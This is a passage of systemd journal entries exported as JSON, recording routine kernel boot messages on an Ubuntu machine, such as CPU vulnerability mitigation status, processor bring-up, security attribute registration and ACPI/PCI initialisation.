"_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "60002", "MESSAGE" : "Spectre V2 : Enabling Restricted Speculation for firmware calls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=99;b=e2b08827b5804427b422c10c84f1567e;m=5587f7;t=5bd16dd19075f;x=61abf76af5eb1488", "__REALTIME_TIMESTAMP" : "1615280779888479", "__MONOTONIC_TIMESTAMP" : "5605367", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "64013", "MESSAGE" : "Spectre V2 : mitigation: Enabling conditional Indirect Branch Prediction Barrier" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9a;b=e2b08827b5804427b422c10c84f1567e;m=558802;t=5bd16dd190769;x=c2b3c220b9500653", "__REALTIME_TIMESTAMP" : "1615280779888489", "__MONOTONIC_TIMESTAMP" : "5605378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "68003", "MESSAGE" : "Speculative Store Bypass: Mitigation: Speculative Store Bypass disabled via prctl and seccomp" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9b;b=e2b08827b5804427b422c10c84f1567e;m=55880c;t=5bd16dd190773;x=4a3a4241b62f64d7", "__REALTIME_TIMESTAMP" : "1615280779888499", "__MONOTONIC_TIMESTAMP" : "5605388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "72048", "MESSAGE" : "MDS: Mitigation: Clear CPU buffers" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9c;b=e2b08827b5804427b422c10c84f1567e;m=558816;t=5bd16dd19077d;x=ca6658fda5d13a1f", "__REALTIME_TIMESTAMP" : "1615280779888509", "__MONOTONIC_TIMESTAMP" : "5605398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "91684", "MESSAGE" : "Freeing SMP alternatives memory: 36K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9d;b=e2b08827b5804427b422c10c84f1567e;m=558831;t=5bd16dd190798;x=b8166bd5baf8d6d1", "__REALTIME_TIMESTAMP" : "1615280779888536", "__MONOTONIC_TIMESTAMP" : "5605425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "96553", "MESSAGE" : "TSC deadline timer enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9e;b=e2b08827b5804427b422c10c84f1567e;m=55883c;t=5bd16dd1907a3;x=5cb1c588c308ecba", "__REALTIME_TIMESTAMP" : "1615280779888547", "__MONOTONIC_TIMESTAMP" : "5605436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "96556", "MESSAGE" : "smpboot: CPU0: Intel Core Processor (Skylake, IBRS) (family: 0x6, model: 0x5e, stepping: 0x3)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9f;b=e2b08827b5804427b422c10c84f1567e;m=55884c;t=5bd16dd1907b4;x=1ac20c1cab97e364", "__REALTIME_TIMESTAMP" : "1615280779888564", "__MONOTONIC_TIMESTAMP" : "5605452", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "100099", "MESSAGE" : "Performance Events: unsupported p6 CPU model 94 no PMU driver, software events only." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a0;b=e2b08827b5804427b422c10c84f1567e;m=558858;t=5bd16dd1907bf;x=e9d2385de9d67c19", "__REALTIME_TIMESTAMP" : "1615280779888575", "__MONOTONIC_TIMESTAMP" : "5605464", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "104049", "MESSAGE" : "Hierarchical SRCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a1;b=e2b08827b5804427b422c10c84f1567e;m=558863;t=5bd16dd1907ca;x=c20d97da25d55b95", "__REALTIME_TIMESTAMP" : "1615280779888586", "__MONOTONIC_TIMESTAMP" : "5605475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "107139", "MESSAGE" : "NMI watchdog: Perf event create on CPU 0 failed with -2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a2;b=e2b08827b5804427b422c10c84f1567e;m=55886e;t=5bd16dd1907d5;x=f34ce16a2801a7cf", "__REALTIME_TIMESTAMP" : "1615280779888597", "__MONOTONIC_TIMESTAMP" : "5605486", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "108004", "MESSAGE" : "NMI watchdog: Perf NMI watchdog permanently disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a3;b=e2b08827b5804427b422c10c84f1567e;m=55887b;t=5bd16dd1907e2;x=9e2f8a8d707002f2", "__REALTIME_TIMESTAMP" : "1615280779888610", "__MONOTONIC_TIMESTAMP" : "5605499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "111112", "MESSAGE" : "smp: Bringing up secondary CPUs ..." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a4;b=e2b08827b5804427b422c10c84f1567e;m=558886;t=5bd16dd1907ed;x=bb76f562d5c0de88", "__REALTIME_TIMESTAMP" : "1615280779888621", "__MONOTONIC_TIMESTAMP" : "5605510", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "112005", "MESSAGE" : "smp: Brought up 1 node, 1 CPU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a5;b=e2b08827b5804427b422c10c84f1567e;m=558891;t=5bd16dd1907f8;x=33b630f886699e2d", "__REALTIME_TIMESTAMP" : "1615280779888632", "__MONOTONIC_TIMESTAMP" : "5605521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "114131", "MESSAGE" : "smpboot: Max logical packages: 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a6;b=e2b08827b5804427b422c10c84f1567e;m=55889b;t=5bd16dd190803;x=2a53e8a90fc43148", "__REALTIME_TIMESTAMP" : "1615280779888643", "__MONOTONIC_TIMESTAMP" : "5605531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "116005", "MESSAGE" : "smpboot: Total of 1 processors activated (4199.98 BogoMIPS)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a7;b=e2b08827b5804427b422c10c84f1567e;m=5588a6;t=5bd16dd19080e;x=746894420000de9d", "__REALTIME_TIMESTAMP" : "1615280779888654", "__MONOTONIC_TIMESTAMP" : "5605542", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "119435", "MESSAGE" : "devtmpfs: initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a8;b=e2b08827b5804427b422c10c84f1567e;m=5588b1;t=5bd16dd190818;x=e72a5a38f55f26df", "__REALTIME_TIMESTAMP" : "1615280779888664", "__MONOTONIC_TIMESTAMP" : "5605553", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "120068", "MESSAGE" : "x86/mm: Memory block size: 128MB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a9;b=e2b08827b5804427b422c10c84f1567e;m=5588bb;t=5bd16dd190823;x=c0a4ca14054c8e4", "__REALTIME_TIMESTAMP" : "1615280779888675", "__MONOTONIC_TIMESTAMP" : "5605563", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "122504", "MESSAGE" : "evm: security.selinux" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=aa;b=e2b08827b5804427b422c10c84f1567e;m=5588c6;t=5bd16dd19082d;x=558fdecd8286a4dc", "__REALTIME_TIMESTAMP" : "1615280779888685", "__MONOTONIC_TIMESTAMP" : "5605574", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "124007", "MESSAGE" : "evm: security.SMACK64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ab;b=e2b08827b5804427b422c10c84f1567e;m=5588d0;t=5bd16dd190838;x=2f1ea8009bd59d94", "__REALTIME_TIMESTAMP" : "1615280779888696", "__MONOTONIC_TIMESTAMP" : "5605584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "125731", "MESSAGE" : "evm: security.SMACK64EXEC" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ac;b=e2b08827b5804427b422c10c84f1567e;m=5588db;t=5bd16dd190843;x=14f8462e86947c7b", "__REALTIME_TIMESTAMP" : "1615280779888707", "__MONOTONIC_TIMESTAMP" : "5605595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "127648", "MESSAGE" : "evm: security.SMACK64TRANSMUTE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ad;b=e2b08827b5804427b422c10c84f1567e;m=5588e9;t=5bd16dd190850;x=83d11ee26d1c338a", "__REALTIME_TIMESTAMP" : "1615280779888720", "__MONOTONIC_TIMESTAMP" : "5605609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "128005", "MESSAGE" : "evm: security.SMACK64MMAP" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ae;b=e2b08827b5804427b422c10c84f1567e;m=5588f3;t=5bd16dd19085b;x=ee2eb152bf5ce56e", "__REALTIME_TIMESTAMP" : "1615280779888731", "__MONOTONIC_TIMESTAMP" : "5605619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "129921", "MESSAGE" : "evm: security.apparmor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=af;b=e2b08827b5804427b422c10c84f1567e;m=5588fe;t=5bd16dd190865;x=ab6a0d553baa82c5", "__REALTIME_TIMESTAMP" : "1615280779888741", "__MONOTONIC_TIMESTAMP" : "5605630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "131759", "MESSAGE" : "evm: security.ima" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b0;b=e2b08827b5804427b422c10c84f1567e;m=558908;t=5bd16dd190870;x=a9eb69f594c7fb0b", "__REALTIME_TIMESTAMP" : "1615280779888752", "__MONOTONIC_TIMESTAMP" : "5605640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "132004", "MESSAGE" : "evm: security.capability" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b1;b=e2b08827b5804427b422c10c84f1567e;m=558913;t=5bd16dd19087b;x=368f694212dd1cfd", "__REALTIME_TIMESTAMP" : "1615280779888763", "__MONOTONIC_TIMESTAMP" : "5605651", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "134067", "MESSAGE" : "clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b2;b=e2b08827b5804427b422c10c84f1567e;m=55891e;t=5bd16dd190885;x=a4b40ddaf08c750b", "__REALTIME_TIMESTAMP" : "1615280779888773", "__MONOTONIC_TIMESTAMP" : "5605662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "136014", "MESSAGE" : "futex hash table entries: 256 (order: 2, 16384 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b3;b=e2b08827b5804427b422c10c84f1567e;m=55894a;t=5bd16dd1908b2;x=ac4fd07b5b9baa26", "__REALTIME_TIMESTAMP" : "1615280779888818", "__MONOTONIC_TIMESTAMP" : "5605706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "139127", "MESSAGE" : "pinctrl core: initialized pinctrl subsystem" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b4;b=e2b08827b5804427b422c10c84f1567e;m=558958;t=5bd16dd1908bf;x=109ba1c01d9671b8", "__REALTIME_TIMESTAMP" : "1615280779888831", "__MONOTONIC_TIMESTAMP" : "5605720", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "140213", "MESSAGE" : "RTC time: 9:06:13, date: 03/09/21" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b5;b=e2b08827b5804427b422c10c84f1567e;m=558971;t=5bd16dd1908d8;x=80838b6178b3c0c8", "__REALTIME_TIMESTAMP" : "1615280779888856", "__MONOTONIC_TIMESTAMP" : "5605745", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "142476", "MESSAGE" : "NET: Registered protocol family 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b6;b=e2b08827b5804427b422c10c84f1567e;m=55897b;t=5bd16dd1908e2;x=cf1b6348726ee031", "__REALTIME_TIMESTAMP" : "1615280779888866", "__MONOTONIC_TIMESTAMP" : "5605755", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "144130", "MESSAGE" : "audit: initializing netlink subsys (disabled)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b7;b=e2b08827b5804427b422c10c84f1567e;m=558987;t=5bd16dd1908ee;x=d881522247a210fc", "__REALTIME_TIMESTAMP" : "1615280779888878", "__MONOTONIC_TIMESTAMP" : "5605767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "146824", "MESSAGE" : "cpuidle: using governor ladder" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b8;b=e2b08827b5804427b422c10c84f1567e;m=5589a5;t=5bd16dd19090c;x=f98760cb0fc5f2a9", "__REALTIME_TIMESTAMP" : "1615280779888908", "__MONOTONIC_TIMESTAMP" : "5605797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "148005", "MESSAGE" : "cpuidle: using governor menu" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b9;b=e2b08827b5804427b422c10c84f1567e;m=5589c7;t=5bd16dd19092e;x=17c77ea6d366b3e3", "__REALTIME_TIMESTAMP" : "1615280779888942", "__MONOTONIC_TIMESTAMP" : "5605831", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "150022", "MESSAGE" : "ACPI: bus type PCI registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ba;b=e2b08827b5804427b422c10c84f1567e;m=5589d4;t=5bd16dd19093c;x=5b7e72e98e290b11", "__REALTIME_TIMESTAMP" : "1615280779888956", "__MONOTONIC_TIMESTAMP" : "5605844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "152006", "MESSAGE" : "acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bb;b=e2b08827b5804427b422c10c84f1567e;m=5589de;t=5bd16dd190945;x=a88f6cfbae8d7670", "__REALTIME_TIMESTAMP" : "1615280779888965", "__MONOTONIC_TIMESTAMP" : "5605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "155216", "MESSAGE" : "audit: type=2000 audit(1615280773.856:1): state=initialized audit_enabled=0 res=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bc;b=e2b08827b5804427b422c10c84f1567e;m=5589e7;t=5bd16dd19094f;x=b67c753439edef0f", "__REALTIME_TIMESTAMP" : "1615280779888975", "__MONOTONIC_TIMESTAMP" : "5605863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "156179", "MESSAGE" : "PCI: Using configuration type 1 for base access" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bd;b=e2b08827b5804427b422c10c84f1567e;m=5589f1;t=5bd16dd190958;x=536aeb8a25d630e8", "__REALTIME_TIMESTAMP" : "1615280779888984", "__MONOTONIC_TIMESTAMP" : "5605873", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "160064", "MESSAGE" : "HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=be;b=e2b08827b5804427b422c10c84f1567e;m=5589fa;t=5bd16dd190962;x=7584dce8696d31f5", "__REALTIME_TIMESTAMP" : "1615280779888994", "__MONOTONIC_TIMESTAMP" : "5605882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "163176", "MESSAGE" : "HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bf;b=e2b08827b5804427b422c10c84f1567e;m=558a04;t=5bd16dd19096b;x=5dfc2fc3abb5b9fb", "__REALTIME_TIMESTAMP" : "1615280779889003", "__MONOTONIC_TIMESTAMP" : "5605892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "164236", "MESSAGE" : "ACPI: Added _OSI(Module Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c0;b=e2b08827b5804427b422c10c84f1567e;m=558a10;t=5bd16dd190977;x=7d5acb62d40d66d1", "__REALTIME_TIMESTAMP" : "1615280779889015", "__MONOTONIC_TIMESTAMP" : "5605904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "166441", "MESSAGE" : "ACPI: Added _OSI(Processor Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c1;b=e2b08827b5804427b422c10c84f1567e;m=558a1a;t=5bd16dd190981;x=6ad2bb73c5d4cdf9", "__REALTIME_TIMESTAMP" : "1615280779889025", "__MONOTONIC_TIMESTAMP" : "5605914", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 